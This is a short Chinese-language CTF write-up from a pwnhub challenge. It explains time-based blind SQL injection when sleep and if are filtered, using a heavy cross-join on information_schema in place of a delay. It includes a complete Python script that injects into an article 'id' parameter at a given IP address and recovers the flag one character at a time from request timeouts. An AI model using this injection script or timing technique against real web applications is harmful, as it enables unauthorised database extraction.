pwnhub | 目瞪狗呆

Author Avatar
Aryb1n 4月 03, 2018

没有回显..好像只能利用时间盲注

hgame里有一道过滤了if的题目好像就是这样子做的…但当时没过滤sleep之类的函数

select 1 from user where id = 1 and 1=1 and sleep(5);
会延时
select 1 from user where id = 1 and 1=0 and sleep(5);
不会延时

这里过滤掉了常用时间盲注函数, 所以可以找到一个耗时的操作来代替原来sleep的位置, 但老有问题…有些位跑出来是错误的…
在延时上的设置…真是QAQ, 令人窒息的操作, 不知道是不是别人也在跑的原因..貌似我只能获得一部分正确的flag, 比如跑出来p0n0u0{, pwnh0b{

import requests
import time
import string


def attack(url):
    try:
        requests.get(url, timeout=10)
#        print "False"
        return False
    except:
#        print "True"
        return True

url = "http://52.80.179.198:8080/article.php?id=1' and {} and 100 > (select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C)-- "

payload = '(1=1)'
payload = '(ord(substr(({}), {}, 1))={})'
payload = payload.format('select flag from flags', '{}', '{}')

att_url = url.format(payload)
print att_url

flag = ""
for i in range(1, 30):
    for ch in string.printable:
        pay = att_url.format(i, ord(ch))
        if attack(pay) == True:
            flag += ch
            print flag
            print pay
            break
        else:
            pass